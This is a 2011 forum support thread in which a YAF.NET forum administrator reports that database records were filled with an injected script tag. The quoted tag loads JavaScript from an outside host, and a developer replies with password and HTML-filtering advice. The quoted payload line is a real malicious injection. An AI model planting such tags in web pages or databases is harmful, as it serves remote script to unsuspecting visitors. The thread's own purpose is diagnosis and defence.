thepbac
  •  thepbac
  • 51.8% (Neutral)
  • YAF Forumling Topic Starter
2011-04-05T05:17:02Z
Hello everyone.

i am using YAF Forum source code  in version 1.9.4 .

Last week, i can't access in my website because its throw a exception : Error when converting a string to number. I have checked code, everything is ok. But when i saw my database.

EVERY RECORD in table x_Registry and x_PMessage has contained a html code

"</title><script src=http://milapop.com/ur.php></script> "

UserPostedImage

I think it's very strange and dangeour.

When I click in a post, example  
A error message display :
"Subquery returned more than 1 value. This is not permitted when the subquery follows =, !=, <, <= , >, >= or when the subquery is used as an expression."

So, please, if you see this before, please help me : Why and what's happing with my site?

Thank so much.
Sponsor
bbobb
  •  bbobb
  • 100% (Exalted)
  • YAF Developer
2011-04-05T05:41:51Z
Realy it's difficult to trace it, and it's strange that it's in the registry table, it should not be written from source code. YAF is stored procedure based and it's very difficult to make an sql injection too. Please, change database password first. Make sure that script tag is not in allowed html tags list and use BBcode editor.
thepbac
  •  thepbac
  • 51.8% (Neutral)
  • YAF Forumling Topic Starter
2011-04-05T05:46:23Z
I am recovering my database before the day when it break.
Not cool.

About Us

The YAF.NET is an open source .NET forum project. YAF.NET is supported by an team of international developers who are build community by building community software.

Powered by Resharper Donate with PayPal button

Project Twitter Updates

Copyright © YetAnotherForum.NET & Ingo Herbote. All rights reserved